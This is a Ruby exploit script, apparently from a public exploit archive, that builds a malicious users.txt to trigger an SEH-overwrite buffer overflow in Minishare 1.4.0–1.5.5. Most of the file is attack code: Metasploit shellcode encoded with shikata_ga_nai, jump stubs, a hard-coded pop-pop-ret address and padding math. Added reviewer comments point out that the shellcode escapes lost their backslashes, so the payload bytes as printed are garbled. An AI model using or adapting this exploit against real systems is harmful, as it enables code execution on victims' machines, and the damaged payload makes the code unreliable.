# Title : Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Published : 2010-11-03
# Author : Muhamad Fadzil Ramli
# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (SEH)
# Date: 11/03/2010
# Author: Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com
# Credit/Bug Found By: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN (VMWARE FUSION - Version 3.1.1)
# CVE: N/A
#! /usr/bin/env ruby
# Defender notes (review): the script writes a single 1000-byte users.txt to the
# current directory, made up mostly of filler (0x90 padding and 'B' bytes) with a
# hard-coded 32-bit address in the SEH slot.  An oversized or non-text users.txt
# is the observable artifact on disk.  The technique depends on overwriting the
# SEH chain with a fixed address from the tested build (Windows XP SP3 per the
# header); platform mitigations such as SafeSEH/SEHOP/DEP presumably reduce its
# reliability on later systems — not stated on the page, treat as an assumption.
filename = 'users.txt' # output path, relative to the working directory
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
# Payload appended chunk by chunk.  NOTE(review): the escape sequences appear to
# have lost their backslashes during extraction, so as printed these are plain
# ASCII literals rather than the byte values the metasploit header describes;
# the length arithmetic below therefore does not match the author's intent as
# shown.
shellcode = ''
shellcode << "xdbxc0x31xc9xbfx7cx16x70xcc"
shellcode << "xd9x74x24xf4xb1x1ex58x31x78"
shellcode << "x18x83xe8xfcx03x78x68xf4x85"
shellcode << "x30x78xbcx65xc9x78xb6x23xf5"
shellcode << "xf3xb4xaex7dx02xaax3ax32x1c"
shellcode << "xbfx62xedx1dx54xd5x66x29x21"
shellcode << "xe7x96x60xf5x71xcax06x35xf5"
shellcode << "x14xc7x7cxfbx1bx05x6bxf0x27"
shellcode << "xddx48xfdx22x38x1bxa2xe8xc3"
shellcode << "xf7x3bx7axcfx4cx4fx23xd3x53"
shellcode << "xa4x57xf7xd8x3bx83x8ex83x1f"
shellcode << "x57x53x64x51xa1x33xcdxf5xc6"
shellcode << "xf5xc1x7ex98xf5xaaxf1x05xa8"
shellcode << "x26x99x3dx3bxc0xd9xfex51x61"
shellcode << "xb6x0ex2fx85x19x87xb7x78x2f"
shellcode << "x59x90x7bxd7x05x7fxe8x7bxca"
nearjmp = "xe9x98xfexffxff" # near jmp 168 bytes (same backslash caveat as above)
# Array#pack('V') encodes a 32-bit unsigned integer little-endian (x86 byte order).
nseh = [0xfffff9eb].pack('V') # short jmp 7 bytes — value placed in the next-SEH slot
seh = [0x0040B145].pack('V') # ppr — hard-coded handler address; build-specific per the tested-on header
# Padding fixes the offsets: junk1 brings padding + shellcode + near jmp to 386
# bytes, junk2 fills the file out to exactly 1000 bytes.
junk1 = "x90" * (386 - (shellcode + nearjmp).length)
junk2 = 'B' * (1000 - (junk1 + shellcode + nearjmp + nseh + seh).length)
# Layout of the written file:
#   [nops][shellcode][near jmp][nseh (short jmp)][seh (pop pop ret)][junk2]
# The author's diagram (garbled in extraction) appears to show: (1) seh is
# reached first, (2) nseh jumps back to the near jmp, (3) the near jmp lands in
# the nop padding ahead of the shellcode.
xploit = junk1 + shellcode + nearjmp + nseh + seh + junk2
# Block form closes the file automatically, including on error.
File.open(filename,'w') do |fd|
fd.write xploit
# .to_s is redundant inside string interpolation; kept as written.
puts "file size : #{xploit.length.to_s}"
end